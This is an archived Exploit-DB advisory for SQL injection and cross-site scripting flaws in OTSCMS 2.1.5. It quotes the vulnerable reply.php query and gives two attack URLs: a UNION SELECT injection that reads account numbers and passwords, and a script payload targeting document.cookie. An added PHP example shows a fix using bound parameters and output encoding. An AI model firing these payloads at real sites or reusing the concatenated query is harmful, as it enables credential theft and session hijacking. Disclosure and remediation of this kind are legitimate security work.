OTSCMS <= 2.1.5 SQL/XSS Multiple Vulnerabilities

2007-02-07T00:00:00
ID EDB-ID:3283
Type exploitdb
Reporter GregStar
Modified 2007-02-07T00:00:00

Description

OTSCMS <= 2.1.5 (SQL/XSS) Multiple Remote Vulnerabilities. CVE-2007-0846, CVE-2007-0847. Webapps exploit for the PHP platform.

                                        
***************************************************************************************************************

                                                 Coding 4 Fun

***************************************************************************************************************

* Name = OTSCMS 2.1.5 by Wrzasq (http://otscms.com) ;

* Class = SQL Injection / XSS ;

* Download = http://sourceforge.net/project/showfiles.php?group_id=145557 ;

* Found by = GregStar (gregstar[at]c4f.pl) (http://c4f.pl) ;

---------------------------------------------------------------------------------------------------------------
[SQL]

Vulnerable code in [path]/mod/PM/reply.php

lines 22-26

...

extract( $http->extract('id') );

// reads message
$pm = $db->query('SELECT [pms].`name` AS `name` [...]  ' AND [pms].`id` = ' . $id)->fetchAll(); <---
$pm = $pm[0];

...

Example :

http://[target]/[path]/priv.php?command=reply&id=-1%20UNION%20SELECT%20accno,null,password%20FROM%20accounts ;


----
[XSS]


http://[target]/[path]/forum.php?module=User&command=profile&name=<script>alert(document.cookie);</script>

# milw0rm.com [2007-02-07]
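
Added example, not part of the original advisory and not OTSCMS code: one way to handle the two inputs above safely, with `id` validated as an integer and bound as a query parameter, and `name` HTML-encoded before output. The PDO/SQLite setup, the simplified `pms` table and the helper names `fetchMessage` and `renderProfileName` are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Constructed in-memory database standing in for the [pms] table (assumed layout).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE pms (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO pms (id, name) VALUES (1, 'hello'), (2, 'private')");

/**
 * Hypothetical replacement for the query in reply.php: the id is validated as
 * a positive integer and then bound as a parameter, never concatenated.
 */
function fetchMessage(PDO $pdo, $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // not a positive integer (also covers array input): reject
    }
    $stmt = $pdo->prepare('SELECT name FROM pms WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** Hypothetical output helper for the profile page: encode before echoing. */
function renderProfileName(string $name): string
{
    return htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: a legitimate id, then the two values shown in the advisory.
var_dump(fetchMessage($pdo, '1'));
var_dump(fetchMessage($pdo, '-1 UNION SELECT accno,null,password FROM accounts'));
echo renderProfileName('<script>alert(document.cookie);</script>'), "\n";
```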